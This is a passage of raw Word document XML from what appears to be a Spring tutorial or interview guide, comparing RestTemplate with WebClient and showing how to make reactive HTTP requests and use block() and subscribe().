      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="0B3106DA" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64804B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ype of Operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28D4971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blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB545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non-blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3A70C66D" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E0852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d for</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A6201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Spring MVC applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CD09F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 applications)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3271C505" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13790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261AF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synchronous exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="748F245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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="1AF0A1D8" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51A019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Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05F65EB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ed support for streaming</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="579C1C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streaming large responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="2F08CF07" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C7D8C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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="177A303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 single thread per request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45998ED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handle many concurrent requests without blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="1C2B03C5" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FFB16F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ion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EAD9A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recated for new applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="450998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eferred for new applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="683568B7" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="393C5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BE2B0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wer in high-concurrency systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="228BCC9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tter performance with high concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4E3B1350" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63FF31D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I Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5027B42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 calls)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E37656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calls with Mono/Flux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B60C28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14509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RestTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you're working with traditional, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or if you are maintaining legacy code that already uses it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863D7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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (especially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systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) that nee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HTTP requests, or when you expect high concurrency and need a scalable solution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D9484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300" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB67B86" w14:textId="7FCB97B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3" w:name="_Toc197867737"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you use WebClient to perform a reactive HTTP request</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="523"/>
    </w:p>
    <w:p w14:paraId="793EE253" w14:textId="7C473240"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to perform a reactive HTTP request in a Spring WebFlux application, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7D8CF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y:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779632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sure that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dependency is added to your pom.xml (for Maven) or build.gradle (for Gradle):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581697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75B7B23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33C3C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8D96D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85C2D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7350AE8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7944F7E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ation 'org.springframework.boot:spring-boot-starter-webflux'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E6C7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WebClient Bean:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617347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to configure a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bean to be used across your application. It can be done in the configuration class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9B86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4F73501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Bean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D507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2889F45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4F6F024C" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B7F7E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5CAE07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Config {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B69388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EA9CA1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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B9A4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WebClient.Builder webClientBuilder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F40FE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C13236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42046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AECE8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allow you to inject a WebClient.Builder into your components/services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D363AA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nject WebClient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447608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your service or component, inject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make the HTTP request reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1F57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07B09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3B39F74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39CF97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BF54692" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA14D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61952E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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048DD57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5043D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WebClient webClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565CB42F" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D795F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njecting WebClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744D63E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Service(WebClient.Builder webClientBuilder) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FDA5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webClient = webClientBuilder.baseUrl("https://jsonplaceholder.typicode.com").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CE75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6E3E4E" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17591F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a reactive HTTP GET request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5118C5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Data() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E62DA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this.webClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71749DD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21D83DB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s the request and retrieves the response body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC44B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s the response body to a Mono of String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28972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A809A7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2B2176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 Reactive HTTP Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45398EC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 initiates an HTTP GET request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2774D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ri("/posts/1") sets the endpoint you want to hit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BAEC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ieve() triggers the request and prepares for response retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0E9B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odyToMono(String.class) processes the response body as a Mono&lt;String&gt;, which is a reactive type. The body is processed asynchronously without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51722F8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sume the Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249687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get the response, you can use reactive operators like subscribe(), block(), or doOnTerminate(). For non-blocking operations,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is often used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD016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2EE46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fetchData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A05652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PostData().subscribe(response -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C05C1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3CA6D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C47BD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CF644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turn the Mono in the Controller (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A46159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use this service method in your controller and return the result directly as Mono or Flux to allow Spring WebFlux to handle the response asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB60A2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0BAF85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GetMapping;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A186D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RestController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABE01C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65700D1" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C71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BBEE8B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5F232E8" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7797CF3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MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F632A7" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2101DB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Controller(MyService myService) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5DFF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myService = myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34197EF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282205" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BADE95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post")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC978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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAECE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yService.getPostData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634301E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CB9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965D67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42E0BE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get()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Initiates a GET HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F2CAC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ri("/posts/1")</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the endpoint to query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775AE0F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trieve()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Performs the request and prepares for response handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7475D41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odyToMono(String.class)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Converts the response body to a Mono&lt;String&gt;, which represents a single, asynchronous value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6756B7E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Nature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D9ACE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ono returned b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type. The call is non-blocking, meaning the thread isn't held up while waiting for the response. Instead, it will be processed asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCBC6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chain additional operators like map(), flatMap(), doOnSuccess(), onErrorResume(), etc., to handle the data or any errors during the HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D91DF1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Important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60288C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call</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you use .block() (not recommended in reactive code), it will block the current thread until the response is returned, negating the non-blocking advantage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9F792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getPostData().block(); // Blocking call (use with caution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8938C9" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00CE4B95"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301" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC5999" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00CE4B95" w:rsidRDefault="004A4102" w:rsidP="004A4102">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="524" w:name="_Toc197867738"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of block() and subscribe() in Spring reactive?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="524"/>
    </w:p>
    <w:p w14:paraId="131BCA93" w14:textId="3F9B58B6" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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Reactive (WebFlux)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, methods like .block() and .subscribe() are used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interact with Mono and Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which are the core reactive types. Here's a clear breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3731C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951B40">
          <v:rect id="_x0000_i2302" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7DB15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bscribe() – Triggers the reactive pipeline (asynchronously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D08BE0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execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the reactive stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336EFC9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC215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ypically used when </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>you don’t need to return a value immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, like logging or side effects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF7D83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52E155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subscribe(value -&gt; System.out.println("Received: " + value));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F4706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ceived: Hello (executed asynchronously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13893787"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434CC0">
          <v:rect id="_x0000_i2303" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1223DF2F"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lock() – Triggers and waits for the result (synchronously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0535B6D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stream and blocks the thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> until it gets the result or completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B4026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stly used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>test case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bridging reactive to blocking code</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
